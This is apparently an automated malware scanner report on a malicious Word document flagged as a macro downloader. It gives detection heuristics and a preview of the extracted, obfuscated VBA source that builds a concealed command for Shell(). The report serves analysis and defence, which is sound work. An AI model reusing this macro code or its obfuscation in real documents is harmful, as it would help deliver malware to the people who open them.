MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The AutoOpen macro is configured to execute, and it utilizes the Shell() function, indicating an attempt to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665580-0' further supports this downloader behavior.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6665580-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6665580-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12438 bytes |
SHA-256: 285fa384f418ebce9c0850e6d163baebe20f93c28c9f0d40bda1db72a8f6e1a3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "joUEhbzwvU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VrZtiGXDQYFj" Function sCiDi() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error NWbZJE / jFRvaO * 19673 * laWnXs Error zzuNQ / EiMlt Error 51547 * 9581 Error OvBvRq * ablwlU lJfpFiaJHFY = "md " + "/V^:" + "^o^" + " /" + "c " + Chr(5 + 5 + 0 + 2 + 22) + " ^" + "s" + "^ET ^ " + "7k^t=" Error RPCzQ / PvPRIM Error JNoJYs / VoqlO * EsuVNI * ZdTCDH ZamhjFzaRp = "^=^A^AI" + "^A" + "^ACA^g^" + "A" + "A^I^A" + "A" + "C^" + "A^gA" + "^" + "AI^A^A" + "CA^g^AA" + "^I^AAC" + "^A^gA" Error 3866 / FHDjul Error 73979 / YTsVi NDUpOb = "^AI" + "^AA" + "C^A^gA^" + "AIAAC" + "^A9^B" Error GDYnm * 95896 * pwiDFv / zruijO CNfkk = "^Q^" + "f^A^s" + "^HA" + "^o^Bw^Y" + "^A^" + "Q^H^A^h" + "^B" + "w^YA" + "^0^" + "HA7A^w^" Error 48049 * 26353 Error 87114 / tjBiL / qBWNlm / wjhNw Error PDozH * CUjiK / 29216 / oCFvAs BFGKJcvzoDA = "aAE" + "^GAlB" + "gcAI" + "G^A^" + "7^AA^T" + "^A^oHA^" + "E" + "BA^" + "J^AACAt" Error ddJrOR / 38750 / LPwiup / CWpoWV Error 6153 * thubl * 24627 * 10814 mSUMFnPKWE = "^BQZ^A^" + "QHAJ^B" + "Q" + "^LAU^" + "GA" + "rB^w^bA" Error 48404 / LpPIkA * 76346 * vQKuM Error iDZiUm * nwjXsG Error ncUPj / HjEVh ZCwVWDSo = "YH" + "^A^uBQ" + "^S^AsD^" + "A^p^AAT" + "A^" + "o" + "H^A" + "E" + "BAJ^A" + "^AC^A^" + "s" Error 10859 / nhQsiC Error 26719 * HBEQb * KqFrNA / WcANk Error EnlCQ * MHhUld Error 48700 * bjWWUM * 75335 / ShQtp Error 23088 * fQKRY / UAhXf * EdbdI EbZra = "Aw" + "U" + "^A^sGA" + "SBAJAgC" + "A^l^B^" + "A" + "^bAk^G" + "^AG" + "B" + "AZA" + "^EG" + "AvB^" + "A" Error jRdzm * vFPjF Error 3637 / cktzD * 58467 * pYUhhz Error XEOKp / OnLiMY KMaMQXXjjrj = "^bA4^" + "GA" + "3" + "^" + "BwbAQ" + "E^AuA^" + "Q^" + "a" + "^A" Error 2165 / sRBBq * 67775 / 17892 Error hqsIRF * BDrbq / MYNziU / GZEXBp EVvpiiGZCo = "c" + "H^" + "A^" + "aB^" + "A^J^A" sCiDi = lJfpFiaJHFY + ZamhjFzaRp + NDUpOb + CNfkk + BFGKJcvzoDA + mSUMFnPKWE + ZCwVWDSo + EbZra + KMaMQXXjjrj + EVvpiiGZCo Error KovwLH * ViuZwW Error ZcPEcn / 87475 End Function Function RIiOXjwXtL() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error 41812 * bpRJt wwUjzPjjR = "s" + "HA5Bgc^" + "A" + "Q^HA7" + "^B^Q^K^" + "A^4^G" + "^AxB^" + "w^b^A" + "^" + "QC^A" + "^gAgb^A" + "^k" + "^GA^gA" Error 87445 * EjrSn / sjNJzZ / LUERn kqCnlKmbwPt = "^w^" + "UA" + "^" + "s^G^" + "A^SB^AJ" + "^A" + "^gCA^o^" + "Bw" Error 88757 * 39456 * 21782 / WvRCr Error 34947 / BzXTk / NSruiw / svbNs Error 21865 / JpZOmI Error 18349 / cYhBdz / 8407 * PYYwEi kddbs = "^Y^AE^G" + "AlBgc^A" + "^8G" + "^A^m" + "Bw^O^A" + "cC^A" + "^" + "l" Error qRGjIq / 55605 Error AvKDh / hXnwLV * aSVvlp * mqzJQ jfmpEZ = "^B^Ae^A" + "^U^G^" + "A^uA^w" + "^JA^" + "sCA^" + "UB^Qc" + "A^M" + "E" Error ZtWoJz / DpdId Error cNEoh * aPRFIj Error VINFA / nONEnL * 45989 * zBndq HKbzIUGZBM = "^AkA^w" + "^KAc" + "C^Ac^B" + "wJA" + "^" Error WwRZDY / 51904 Error lKYbfi * 733 Error 80074 * KCMQNz * 99809 * VIRSQ Error GcbdL / ZtVTAi Error 59271 / DTwOrR FwYpiCDqi = "sC" + "A^j^B" + "^" + "Q^a^" + "A" + "w^GAiBQ" + "^dA^AH^" Error 21289 * fCbYV / IbKKpD / smWUW Error IAXBdN * wQhCj GXAvFNVN = "A" + "^6^A^" + "g^" + "d" + "^A^" + "4^G" + "^A" + "lB^A^J^" + "A^0D^A" + "^M" RIiOXjwXtL = wwUjzPjjR + kqCnlKmbwPt + kddbs + jfmpEZ + HKbzIUGZBM + FwYpiCDqi + GXAvFNVN Error BGhvU * ifZvI Error 62069 * wVzjsG * 50503 / 56269 Error 22441 / dHGnE / 22803 * YzXRw Error 90409 * 9597 End Function Function mLjIcJWB() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error zVaHAV * 16 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.